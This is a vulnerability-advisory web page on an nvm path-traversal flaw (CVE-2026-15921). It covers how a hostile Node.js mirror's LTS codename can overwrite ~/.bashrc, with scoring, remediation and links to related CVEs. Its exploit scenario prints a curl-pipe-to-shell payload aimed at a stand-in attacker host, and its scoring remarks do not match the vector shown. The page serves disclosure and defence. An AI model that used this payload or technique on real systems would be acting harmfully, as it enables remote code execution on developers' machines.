Node Version Manager CVE-2026-15921
LOWSeverity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AC:H for required MITM or mirror compromise precondition; I:H because attacker-controlled content written to shell startup files yields deferred arbitrary code execution.
Primary rating from Vendor (harborist).
CVSS VectorVendor: harborist
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
2DescriptionCVE.org
Node Version Manager (nvm) is a POSIX-compliant shell function for managing multiple node.js versions. In versions 0.32.1 through 0.40.5, nvm ls-remote (and other commands that refresh remote LTS aliases, such as nvm install --lts) parse the node.js mirror's index.tab and use each release's LTS codename field as an alias filename without validating it. A malicious, compromised, or man-in-the-middled mirror can return an LTS codename containing path-traversal sequences such as ../../../.bashrc, causing nvm to write the associated version string to a path outside $NVM_DIR/alias. With the default layout ($NVM_DIR is ~/.nvm), this can create or overwrite files in the user's home directory, including shell startup files, which can lead to code execution in a later shell session. Exploitation requires the victim to use a hostile mirror -- via a compromised mirror or CDN, a network man-in-the-middle, or a maliciously configured NVM_NODEJS_ORG_MIRROR/NVM_IOJS_ORG_MIRROR -- and to run an affected command. Version 0.40.6 validates remote LTS codenames as safe alias filenames and rejects .. path components when writing alias files.
AnalysisAI
Path traversal in nvm versions 0.32.1 through 0.40.5 allows a hostile Node.js mirror to overwrite arbitrary files in the victim's home directory, including shell startup files, leading to code execution on the next shell session. The vulnerability exists in nvm ls-remote, nvm install --lts, and any other nvm command that refreshes remote LTS aliases by fetching and parsing a mirror's index.tab - the LTS codename field is used as an alias filename without sanitization, permitting sequences like ../../../.bashrc to escape $NVM_DIR/alias. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three simultaneous conditions: (1) The victim must be running nvm version 0.32.1 through 0.40.5. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Despite the 'RCE' tag, the CVSS 4.0 base score of 2.1 correctly reflects the mandatory attack preconditions: AT:P (attack prerequisites present) requires the victim's nvm to communicate with a hostile mirror - achieved via MITM, compromised mirror infrastructure, or a deliberately misconfigured `NVM_NODEJS_ORG_MIRROR`/`NVM_IOJS_ORG_MIRROR` environment variable. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker positioned as a MITM on the victim's network (or operating a compromised mirror the victim's `NVM_NODEJS_ORG_MIRROR` points to) serves a crafted `index.tab` in which the LTS codename column contains `../../../.bashrc` and the version column contains a shell command payload such as `$(curl attacker.com/shell.sh | sh) #`. When the victim runs `nvm install --lts` or `nvm ls-remote`, nvm writes that payload string to `~/.bashrc`. … |
| Remediation | Upgrade to nvm version 0.40.6, which validates LTS codenames against a strict allowlist regex and rejects any alias containing `..` path components. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote
Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t
Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete
Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner
Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi
Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin
The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic
Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat
The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allShare
External POC / Exploit Code
Leaving vuln.today